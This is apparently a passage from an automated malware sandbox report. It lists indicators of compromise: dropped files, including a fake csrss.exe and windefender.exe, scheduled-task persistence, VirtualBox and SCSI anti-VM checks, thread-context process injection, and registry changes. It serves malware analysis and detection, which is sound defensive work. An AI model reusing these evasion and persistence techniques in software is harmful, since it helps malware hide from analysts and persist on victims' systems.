PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\DRVSTORE\VBoxDrv_B8F73A07F6EAC225F4EF78BAAC74D227A152D39D\VBoxDrv.inf MsiExec.exe File opened for modification C:\Windows\system32\DRVSTORE MsiExec.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol gYvBj1ZGfOqJfVDf4rLNtsmi.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol WifcjtG.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F WifcjtG.exe File created C:\Windows\system32\DRVSTORE\VBoxDrv_B8F73A07F6EAC225F4EF78BAAC74D227A152D39D\VBoxDrv.cat MsiExec.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini gYvBj1ZGfOqJfVDf4rLNtsmi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA WifcjtG.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini OOoMkQq.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt MsiExec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
gYvBj1ZGfOqJfVDf4rLNtsmi.exepid process 240 gYvBj1ZGfOqJfVDf4rLNtsmi.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
a3d607292f456d782622bdf10ddcaa72.exerun.execmd.exedescription pid process target process PID 2232 set thread context of 3060 2232 a3d607292f456d782622bdf10ddcaa72.exe installutil.exe PID 1084 set thread context of 1400 1084 run.exe cmd.exe PID 1400 set thread context of 1620 1400 cmd.exe MSBuild.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
afCO4RNNOdc8dre3EnIRbez8.exeauK8VZaRDVFWuHg35HoY616s.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN afCO4RNNOdc8dre3EnIRbez8.exe File opened (read-only) \??\VBoxMiniRdrDN auK8VZaRDVFWuHg35HoY616s.exe -
Drops file in Program Files directory 64 IoCs
Processes:
msiexec.exeWifcjtG.exedescription ioc process File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ru.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\msvcp100.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxAuth.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxRT.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSupLib.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_es.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxBugReport.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSharedClipboard.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_eu.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_ko.qm msiexec.exe File created C:\Program Files (x86)\epoBtGYzqLvU2\ksUzfSX.xml WifcjtG.exe File created C:\Program Files\Oracle\VirtualBox\VBoxAuthSimple.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VMMR0.r0 msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ko.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\win_nt5_unattended.sif msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VirtualBoxVM.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UICommon.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\doc\UserManual.pdf msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxNetNAT.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_de.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_uk.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_ru.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe msiexec.exe File created C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\PgNwAWM.dll WifcjtG.exe File created C:\Program Files\Oracle\VirtualBox\Qt5PrintSupportVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_eu.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_ja.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_nl.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_pl.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_sl.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_cs.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\Qt5WidgetsVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\sdk\install\vboxapisetup.py msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxBalloonCtrl.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDDR0.r0 msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxWebSrv.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\redhat67_ks.cfg msiexec.exe File created C:\Program Files\Oracle\VirtualBox\x86\VBoxRT-x86.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_cs.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_fa.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_en.qm msiexec.exe File created C:\Program Files (x86)\ecOJmsgAHWlsC\pKvwmcM.xml WifcjtG.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDD.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxManage.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSDL.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxNetNAT.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_id.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_it.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\redhat_postinstall.sh msiexec.exe File created C:\Program Files\Oracle\VirtualBox\x86\msvcr100.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\drivers\vboxdrv\VBoxDrv.sys msiexec.exe File created C:\Program Files\Oracle\VirtualBox\x86\VBoxProxyStub-x86.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_fr.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_sl.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\Qt5CoreVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxAutostartSvc.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxGuestAdditions.iso msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxHeadless.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ca.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_id.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VirtualBox.chm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\sdk\install\vboxapi\VirtualBox_constants.py msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_hu.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_bg.qm msiexec.exe -
Drops file in Windows directory 22 IoCs
Processes:
auK8VZaRDVFWuHg35HoY616s.exeschtasks.exemsiexec.exeafCO4RNNOdc8dre3EnIRbez8.exeschtasks.exeschtasks.exeMsiExec.execsrss.exemakecab.exeschtasks.exedescription ioc process File opened for modification C:\Windows\rss\csrss.exe auK8VZaRDVFWuHg35HoY616s.exe File created C:\Windows\Tasks\yfARWRprRqUFWeTGf.job schtasks.exe File opened for modification C:\Windows\Installer\MSI7833.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI79C9.tmp msiexec.exe File opened for modification C:\Windows\Installer\{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC}\IconVirtualBox msiexec.exe File opened for modification C:\Windows\rss afCO4RNNOdc8dre3EnIRbez8.exe File created C:\Windows\Tasks\JHJXtPPPvDXVqpH.job schtasks.exe File created C:\Windows\Installer\{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC}\IconVirtualBox msiexec.exe File opened for modification C:\Windows\rss auK8VZaRDVFWuHg35HoY616s.exe File opened for modification C:\Windows\Installer\f776ef9.msi msiexec.exe File created C:\Windows\Tasks\aNyMQclguOCSCcjxm.job schtasks.exe File created C:\Windows\Installer\f776efc.ipi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\INF\setupapi.app.log MsiExec.exe File created C:\Windows\windefender.exe csrss.exe File created C:\Windows\Logs\CBS\CbsPersist_20240428093217.cab makecab.exe File created C:\Windows\Tasks\biPxHmULFllsbMgnpt.job schtasks.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Installer\f776ef9.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI7F47.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8447.tmp msiexec.exe File created C:\Windows\rss\csrss.exe afCO4RNNOdc8dre3EnIRbez8.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 2696 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
u1pw.3.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1pw.3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1pw.3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1pw.3.exe -
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2900 schtasks.exe 2880 schtasks.exe 2084 schtasks.exe 964 schtasks.exe 1944 schtasks.exe 2648 schtasks.exe 2316 schtasks.exe 2760 schtasks.exe 920 schtasks.exe 2300 schtasks.exe 3044 schtasks.exe 1224 schtasks.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
Install.exeInstall.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
auK8VZaRDVFWuHg35HoY616s.exeWifcjtG.exewindefender.exenetsh.exeOOoMkQq.exewscript.exepowershell.exenetsh.exeMsiExec.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" auK8VZaRDVFWuHg35HoY616s.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" auK8VZaRDVFWuHg35HoY616s.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs WifcjtG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" auK8VZaRDVFWuHg35HoY616s.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-572 = "China Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" auK8VZaRDVFWuHg35HoY616s.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" auK8VZaRDVFWuHg35HoY616s.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" OOoMkQq.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-552 = "North Asia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" auK8VZaRDVFWuHg35HoY616s.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs WifcjtG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" auK8VZaRDVFWuHg35HoY616s.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" auK8VZaRDVFWuHg35HoY616s.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings WifcjtG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" auK8VZaRDVFWuHg35HoY616s.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" auK8VZaRDVFWuHg35HoY616s.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates WifcjtG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" auK8VZaRDVFWuHg35HoY616s.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs WifcjtG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" auK8VZaRDVFWuHg35HoY616s.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" auK8VZaRDVFWuHg35HoY616s.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" auK8VZaRDVFWuHg35HoY616s.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" auK8VZaRDVFWuHg35HoY616s.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" auK8VZaRDVFWuHg35HoY616s.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" auK8VZaRDVFWuHg35HoY616s.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-491 = "India Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" auK8VZaRDVFWuHg35HoY616s.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" auK8VZaRDVFWuHg35HoY616s.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" auK8VZaRDVFWuHg35HoY616s.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" auK8VZaRDVFWuHg35HoY616s.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c6-df-05-09-4f-2d\WpadDecisionTime = b03502214f99da01 WifcjtG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs MsiExec.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c6-df-05-09-4f-2d WifcjtG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs MsiExec.exe -
Modifies registry class 64 IoCs
Processes:
msiexec.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{7C5E945F-2354-4267-883F-2F417D216519} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{C0447716-FF5A-4795-B57A-ECD5FFFA18A4}\ProxyStubClsid32 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{5CA9E537-5A1D-43F1-6F27-6A0DB298A9A8}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{334DF94A-7556-4CBC-8C04-043096B02D82}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{A06FD66A-3188-4C8C-8756-1395E8CB691C}\NumMethods\ = "13" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{C40C2B86-73A5-46CC-8227-93FE57D006A6}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{F2F7FAE4-4A06-81FC-A916-78B2DA1FA0E5}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1E775EA3-9070-4F9C-B0D5-53054496DBE0}\NumMethods\ = "18" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6F302674-C927-11E7-B788-33C248E71FC7}\TypeLib\Version = "1.3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{B14290AD-CD54-400C-B858-797BCB82570E} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B1D978B8-F7B7-4B05-900E-2A9253C00F51}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{F4D803B4-9B2D-4377-BFE6-9702E881516B}\ = "ISnapshotRestoredEvent" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{45587218-4289-EF4E-8E6A-E5B07816B631}\NumMethods\ = "37" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{24EEF068-C380-4510-BC7C-19314A7352F1}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{A5BBDB7D-8CE7-469F-A4C2-6476F581FF72}\NumMethods\ = "14" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{FF5BEFC3-4BA3-7903-2AA4-43988BA11554}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{081FC833-C6FA-430E-6020-6A505D086387}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{181DFB55-394D-44D3-9EDB-AF2C4472C40A}\NumMethods\ = "15" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91F33D6F-E621-4F70-A77E-15F0E3C714D5}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92F21DC0-44DE-1653-B717-2EBF0CA9B664}\NumMethods\ = "39" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D0D6C6D8-E5DB-4D2C-BAAA-C71053A6236D}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D78374E9-486E-472F-481B-969746AF2480}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\VirtualBox.VirtualBox.1\CLSID msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{16CED992-5FDC-4ABA-AFF5-6A39BBD7C38B}\TypeLib\Version = "1.3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{2514881B-23D0-430A-A7FF-7ED7F05534BC}\ProxyStubClsid32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{DEDFB5D9-4C1B-EDF7-FDF3-C1BE6827DC28}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{DFE56449-6989-4002-80CF-3607F377D40C}\ = "IUSBProxyBackend" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0DE887F2-B7DB-4616-AAC6-CFB94D89BA78}\NumMethods\ = 